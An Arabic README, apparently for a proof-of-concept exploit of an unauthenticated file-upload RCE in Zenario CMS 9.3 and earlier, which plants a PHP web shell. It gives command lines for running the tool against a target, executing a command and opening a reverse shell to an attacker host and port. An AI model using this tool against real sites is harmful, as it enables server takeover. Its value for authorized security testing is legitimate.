
هذا هو استغلال PoC لـ CVE-2022-41840، لتشغيل Zenario
ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) بدون مصادقة تؤثر على Zenario CMS الإصدار 9.3 والإصدارات الأقدم. يستغل الاستغلال ثغرة رفع ملفات في نقطة نهاية AJAX لرفع قشرة ويب PHP وتحقيق تنفيذ التعليمات البرمجية.
/zenario/ajax.phppython3 zenario_exploit.py --target http://target.com
python3 zenario_exploit.py --target http://target.com --cmd "id"
python3 zenario_exploit.py --target http://target.com --lhost 10.x.x.x --lport 4444
requestsتثبيت التبعيات:
pip install requests
لأغراض تعليمية واختبارات أمنية مرخصة فقط.
هذه الأداة مُقدمة لباحثي الأمن ومختبري الاختراق لاختبار أنظمة يمتلكونها أو لديهم إذن صريح لاختبارها. الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني وممنوع منعًا باتًا.
لا يتحمل المسؤولون أي مسؤولية عن أي استخدام خاطئ أو ضرر ناتج عن هذه الأداة.
هذا الكود مُقدم للأغراض التعليمية.